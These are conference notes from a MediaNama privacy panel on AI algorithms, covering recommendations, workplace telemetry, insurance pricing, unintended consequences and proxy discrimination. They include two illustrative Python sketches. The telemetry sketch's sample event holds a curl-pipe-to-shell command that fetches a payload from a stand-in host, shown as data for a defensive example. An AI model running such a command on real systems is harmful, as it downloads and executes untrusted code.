On 5th October, MediaNama held a #NAMAprivacy conference in Bangalore focused on Privacy in the context of Artificial Intelligence, the Internet of Things and the issue of consent, supported by Google, Amazon, Mozilla, ISOC, E2E Networks and Info Edge, with community partners HasGeek and the Takshashila Institution. Part 1 of the notes from the discussion on AI and Privacy is here. Part 2 is here. Part 3:

Algorithms are incredibly complex, and sometimes even their creators cannot fully understand them.

Recommendations

One of the most common implementations of algorithms comes in recommendations, like those in search results or on streaming services like Netflix. Anupam Manur from the Takshashila Institution pointed out: “Recommendations like Netflix movie recommendations may not be harmful, but concentrated recommendations on Twitter will lead to echo chambers, and that can be harmful in an aggregated way.” Indeed, filter bubbles are a known phenomenon.

Sanjay Jain from iSPIRT argued that regulation should target tangible harms: “The whole question of personalization, recommendations, etc., is going to be a theoretical discussion. We should start from the harm. Suppose a recommendation system causes me harm: because of who I am, I have to pay a higher taxi rate, and the reason I pay it is a certain protected category. Let’s say you’re female and end up with a higher rate from the taxi company; then that becomes unfair. Per se, recommendation systems cannot be argued to be fair or unfair. It comes back again to outcomes and harms, and that’s where you start from.”

Intent of data collection

Anand Venkatanarayanan, a senior engineer at NetApp, said: “Recently, companies have been running interesting experiments on data collection for threat detection. They have started collecting everything a user does on their company laptop. Everything, n = all. Because they figured out that this is the only way in which they can do large-scale threat detection with thirty-minute responses. People have been very unhappy about it, because in the past this has not been done. The answer is: well, the intent is not to do finger-profiling of you, but to ensure that the systems are not breached because of something you did somewhere else.

“In reality, if you call data collection itself a privacy breach, then almost everything is a breach, right? But we can do a lot of prevention in terms of purpose limitation, differential encryption, and property-preserving encryption, to ensure that even if user data is compromised and put outside, you can’t make anything out of it except IP addresses.”
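A rough sketch of what that could look like in practice. This is illustrative only, not something described at the panel, and the field names, keys and library used are assumptions: identifying fields in an endpoint-telemetry event are keyed-hashed or encrypted before storage, so that a leaked record exposes little beyond the network metadata the detection rules actually match on.

```python
# Illustrative sketch: protect identifying fields in endpoint telemetry before
# it is stored, so a leaked record reveals little beyond what detection needs.
import hashlib
import hmac
import json

from cryptography.fernet import Fernet  # third-party: pip install cryptography

PSEUDONYM_KEY = b"rotate-me-regularly"  # hypothetical keyed-hash secret
FIELD_KEY = Fernet.generate_key()       # hypothetical key, held by the security team
fernet = Fernet(FIELD_KEY)

def protect(event: dict) -> dict:
    """Return a storable copy of the event with identifying fields protected."""
    return {
        # Keyed hash: stable enough to correlate one user's events, not reversible.
        "user": hmac.new(PSEUDONYM_KEY, event["user"].encode(), hashlib.sha256).hexdigest(),
        # Full detail retained, but unreadable without the field key.
        "cmdline": fernet.encrypt(event["cmdline"].encode()).decode(),
        # Left in the clear because detection rules match on it directly.
        "src_ip": event["src_ip"],
        "timestamp": event["timestamp"],
    }

event = {
    "user": "alice",
    "cmdline": "curl http://203.0.113.7/payload.sh | sh",
    "src_ip": "10.0.0.5",
    "timestamp": "2017-10-05T10:00:00Z",
}
print(json.dumps(protect(event), indent=2))
```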

Defying sectoral codes

Srinivas P, head of Data Security at Infosys, pointed to an example of impermissible algorithms: “Often, what kind of algorithms are permitted or not is also outside the purview of the data privacy domain. Take, for instance, insurance. There’s a company in Canada which is being prosecuted now. What they’ve done is: people who bought cars chose to avail a maintenance service using IoT, basically, to see when to change the wheels, when the warranty on the wheels is going to end, timely maintenance steps, things like that. That data included the speed, the acceleration, the time at which you’re driving, where in Canada (I think in Toronto), which area, which territory, whether there are lots of pubs there, all kinds of data. The company looked at it, felt that certain kinds of users are highly prone to accidents, and therefore increased their premiums. So is this something we can allow?

“So these kinds of things are difficult to put into a data privacy law, to say what’s permitted or not. The provincial insurance regulators have to step in and determine that, because insurance is based on the concept that anybody taking insurance is equally likely to cause an accident or become the victim of one, unless you’re racing or rallying. These algorithms sometimes defy the traditional logic built into the sectoral codes. Therefore I think there is a need for other laws to pitch in on what can and cannot be done, but innovators will continue to do this, because their focus is to use technology to make money.”

Unintended consequences

Most algorithmic harms come from unintended consequences, not from nefarious and deliberate processes.

Akash Mahajan from Appsecco pointed to an example: “Looking at unintended consequences from the point of view of IT security: one really large phone manufacturer did a project where they figured out that whenever it’s time for a new version of their operating system to be released, their servers tend to get slow, because obviously everyone wants to download the latest update as soon as it’s out. So they decided that this is definitely a machine learning problem: let’s figure out which geographic regions in the world to provision more servers in, based on where more people are downloading and bandwidth consumption is higher. They provision and spend money on servers where the demand is highest.

“But what happens when they have to release an immediate security patch, because anyone running a rogue wireless access point can attack their phones? If a company, individual or government made the security assumption that this phone is secure and will stay secure, and suddenly the patch doesn’t reach them fast enough because the ML decides that this region doesn’t usually require this download so early, those are some unintended consequences we’ll never think of. The same applies to OTP notifications, when we use another out-of-band pipeline to authenticate against something.”

Sunil Abraham pointed out, “Unintended consequences is the age-old problem in regulation. There’s nothing we can do in any domain around unintended consequences.”

Ambient or proxy data

Let’s say you prevent the collection of certain data. But what happens when that data is inferred from other signals anyway?

Beni Chugh from the IFMR Finance Foundation said, “When it comes to algorithms in particular, we as a society may need to have some kind of fencing off: there may be certain kinds of variables that we’re definitely not going to touch. But even if we say we won’t touch them, what about the proxies, the other variables that pick up on those fenced-off variables?”

Sunil Abraham suggested two ways around this: “You could go blind, which means you delete that column of the database and then assume that the outcome will not be discriminatory. Or you could do it by keeping the column in the database and checking whether the outcome correlates with the column.”
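As a minimal sketch of the second option (keeping the fenced-off column and checking outcomes against it), the toy data and pricing rule below are invented for illustration. They also show Beni Chugh’s proxy concern: the model never reads the protected column, yet its outcomes still correlate with it.

```python
# Illustrative sketch: keep the protected attribute and test whether outcomes
# differ across it, instead of deleting the column and assuming fairness.
import random

random.seed(7)

records = []
for _ in range(10_000):
    gender = random.choice(["F", "M"])
    # In this toy data, city zone acts as a proxy: one group is concentrated
    # in zone A, so a model can discriminate without ever reading 'gender'.
    weights = [3, 1, 1] if gender == "F" else [1, 3, 3]
    zone = random.choices(["A", "B", "C"], weights=weights)[0]
    # Toy pricing rule: surge pricing depends only on the zone.
    surge = 1 if zone == "A" and random.random() < 0.6 else 0
    records.append({"gender": gender, "zone": zone, "surge": surge})

def surge_rate(group: str) -> float:
    rows = [r for r in records if r["gender"] == group]
    return sum(r["surge"] for r in rows) / len(rows)

# If the rates differ markedly, the outcome correlates with the fenced-off
# column even though the model never saw it.
print(f"surge rate (F): {surge_rate('F'):.2f}")
print(f"surge rate (M): {surge_rate('M'):.2f}")
print(f"disparity:      {surge_rate('F') - surge_rate('M'):+.2f}")
```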

*

#NAMAprivacy Bangalore:

  • Will Artificial Intelligence and Machine Learning kill privacy? [read]
  • Regulating Artificial Intelligence algorithms [read]
  • Data standards for IoT and home automation systems [read]
  • The economics and business models of IoT and other issues [read]

#NAMAprivacy Delhi:

  • Blockchains and the role of differential privacy [read]
  • Setting up purpose limitation for data collected by companies [read]
  • The role of app ecosystems and nature of permissions in data collection [read]
  • Rights-based approach vs rules-based approach to data collection [read]
  • Data colonisation and regulating cross border data flows [read]
  • Challenges with consent; the Right to Privacy judgment [read]
  • Consent and the need for a data protection regulator [read]
  • Making consent work in India [read]